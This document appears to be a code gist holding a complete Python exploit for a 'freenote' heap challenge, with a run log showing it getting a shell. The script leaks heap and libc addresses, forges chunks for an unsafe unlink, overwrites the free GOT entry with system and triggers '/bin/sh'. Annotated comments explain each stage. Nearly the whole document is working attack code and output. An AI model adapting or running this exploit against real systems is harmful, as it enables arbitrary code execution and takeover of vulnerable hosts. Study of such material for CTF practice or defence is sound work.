@inaz2
Last active October 18, 2016 08:18
$ python test.py
[+} leak libc and heap address
base_heap = 14e7000
base_libc = 7f667cdea000
[+] unsafe unlink attack
[+] got overwrite: free -> system
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
from minipwn import *
def new_note(s, length, data):
    """Drive menu option 2 ("new note") on the target.

    Answers the menu prompt with 2 and the length prompt with `length`,
    then sends `data` raw (no trailing newline) once the note prompt shows.
    Nothing here checks that len(data) matches `length`; the caller is
    responsible for that, as it is for the byte content (NULs included).
    """
    answers = (
        ('Your choice: ', 2),
        ('Length of new note: ', length),
    )
    for prompt, value in answers:
        recvuntil(s, prompt)
        sendline(s, str(value))
    recvuntil(s, 'Enter your note: ')
    s.sendall(data)
def edit_note(s, note_number, length, data):
    """Drive menu option 3 ("edit note") on the target.

    Answers the menu prompt with 3, then the note-number and length prompts
    with `note_number` / `length`, and finally sends `data` raw (no trailing
    newline). No local check relates len(data) to `length`; the caller sets
    both.
    """
    answers = (
        ('Your choice: ', 3),
        ('Note number: ', note_number),
        ('Length of note: ', length),
    )
    for prompt, value in answers:
        recvuntil(s, prompt)
        sendline(s, str(value))
    recvuntil(s, 'Enter your note: ')
    s.sendall(data)
def delete_note(s, note_number):
    """Drive menu option 4 ("delete note") on the target.

    Answers the menu prompt with 4 and the note-number prompt with
    `note_number`. Does not consume the target's response, so the next
    helper's recvuntil() picks up from wherever the menu reappears.
    """
    answers = (
        ('Your choice: ', 4),
        ('Note number: ', note_number),
    )
    for prompt, value in answers:
        recvuntil(s, prompt)
        sendline(s, str(value))
# ---------------------------------------------------------------------------
# Exploit driver. connect_process/recvuntil/recvline/sendline/u64/p64/interact
# all come from the `from minipwn import *` above. Every numeric offset below
# (0x1820, 0x3c3b78, 0x45380, 0x602018) is tied to one specific build of the
# target and its libc; the transcript above shows the libc this ran against
# (Ubuntu GLIBC 2.23-0ubuntu3). Expect them to shift on any other build.
# ---------------------------------------------------------------------------
s = connect_process(['./freenote'])
# Blocks until Enter is pressed; presumably a window to attach a debugger to
# the freshly spawned process before any input is sent.
raw_input()

# ---- Stage 1: leak a heap address and a libc address ----------------------
# NOTE(review): banner typo "[+}" (should be "[+]"). Cosmetic only, and the
# transcript above reproduces it, so it is left untouched here.
print '[+} leak libc and heap address'
# Four notes of the same size, then free two non-adjacent ones (2 and 0).
# Presumably chosen so the two freed chunks do not coalesce and their
# fd/bk link fields end up holding heap and arena pointers.
new_note(s, 0x10, 'A'*0x10)
new_note(s, 0x10, 'B'*0x10)
new_note(s, 0x10, 'C'*0x10)
new_note(s, 0x10, 'D'*0x10)
delete_note(s, 2)
delete_note(s, 0)
# Re-allocate with only 8 bytes of content: the first 8 bytes of the recycled
# chunk (its fd) are overwritten, the 8 bytes after (its bk) are left intact
# and will be printed back to us.
new_note(s, 0x8, 'E'*0x8)
# Menu option 1 = list notes. Only the first line is parsed; the two extra
# recvline() calls just drain the rest of the listing.
recvuntil(s, 'Your choice: ')
sendline(s, str(1))
data = recvline(s)
recvline(s)
recvline(s)
data = data.rstrip()
# data[11:] skips the listing prefix plus the 8 'E' bytes (presumably
# "0. " + 8 bytes = 11 chars); the leaked pointer's high bytes are zero so
# the printed bytes stop short of 8 and are padded before u64().
addr_heap = u64(data[11:].ljust(8, '\x00'))
# Distance from the leaked pointer back to the heap base; empirically derived
# for this exact allocation sequence and target build.
base_heap = addr_heap - 0x1820
print "base_heap = %x" % base_heap
# Same trick again with a different pair of frees so that the untouched
# 8 bytes now hold an arena (libc) pointer rather than a heap pointer.
delete_note(s, 3)
delete_note(s, 0)
new_note(s, 0x8, 'F'*0x8)
recvuntil(s, 'Your choice: ')
sendline(s, str(1))
data = recvline(s)
recvline(s)
data = data.rstrip()
arena_top = u64(data[11:].ljust(8, '\x00'))
# Offset of the leaked main_arena field within libc. Valid only for the
# libc build shown in the transcript above (GLIBC 2.23-0ubuntu3).
base_libc = arena_top - 0x3c3b78
print "base_libc = %x" % base_libc
# Clear the remaining notes so the next stage starts from an empty table.
delete_note(s, 0)
delete_note(s, 1)

# ---- Stage 2: unsafe unlink -> control of a note pointer ------------------
print '[+] unsafe unlink attack'
# Heap location that holds a pointer to our forged chunk; presumably the
# pointer slot of note 0 in the target's note table -- verify against the
# binary. unlink() will write (addr_target - 0x18) into it.
addr_target = base_heap + 0x30
# Three adjacent notes freed back to back; presumably they coalesce so that
# the following 0x220 allocation lands at note 0's old address and spans
# note 1's old chunk as well.
new_note(s, 0x100, 'A'*0x100)
new_note(s, 0x100, 'B'*0x100)
new_note(s, 0x100, 'C'*0x100)
delete_note(s, 0)
delete_note(s, 1)
delete_note(s, 2)
# Forged layout inside the 0x220 note:
#   +0x000  fake chunk P header (prev_size/size left as zero)
#   +0x010  P->fd = addr_target - 0x18   } FD->bk and BK->fd both resolve to
#   +0x018  P->bk = addr_target - 0x10   } *addr_target == P, passing the
#                                          glibc 2.23 unlink sanity check
#   +0x100  next chunk header: prev_size 0x100, size 0x110 with PREV_INUSE
#           clear, so freeing it consolidates backwards into P via unlink()
#   +0x210  the chunk after that: size 0x111 (PREV_INUSE set) so the freed
#           chunk itself is treated as in use
buf = '\x00' * 0x10
buf += p64(addr_target-0x18)
buf += p64(addr_target-0x10)
buf += '\x00' * 0xe0
buf += p64(0x100)
buf += p64(0x110)
buf += '\x00' * 0x100
buf += p64(0)
buf += p64(0x111)
new_note(s, 0x220, buf)
# Note 1 was already deleted above; freeing it again relies on the target
# still holding its old pointer (presumably a dangling entry in the note
# table, i.e. a double free -- confirm against the binary). That pointer
# lands on the forged header at +0x100, triggering the unlink write.
delete_note(s, 1)

# ---- Stage 3: GOT overwrite free -> system --------------------------------
print '[+] got overwrite: free -> system'
# Fixed GOT address: the binary is evidently not PIE.
got_free = 0x602018
# system() offset for the libc build in the transcript above.
addr_libc_system = base_libc + 0x45380
# Note 0's pointer now points 0x18 bytes before addr_target, so editing
# note 0 rewrites the table entry itself. The four qwords presumably restore
# a sane entry (in_use = 1, length = 8) and set its pointer to free@GOT;
# the leading 0 overwrites whatever field precedes the entry -- unverified.
buf = p64(0)
buf += p64(1)
buf += p64(8)
buf += p64(got_free)
buf = buf.ljust(0x220, '\x00')
edit_note(s, 0, 0x220, buf)
# Note 0 now aliases free@GOT; an 8-byte edit replaces free with system.
edit_note(s, 0, 8, p64(addr_libc_system))

# ---- Stage 4: trigger ------------------------------------------------------
print '[+] got a shell!'
# Allocate a note holding "/bin/sh"; deleting it calls free(ptr), which is
# now system(ptr). The new note is deleted as index 1, presumably the slot
# it was assigned after the table rewrite above.
new_note(s, 8, '/bin/sh\x00')
delete_note(s, 1)
interact(s)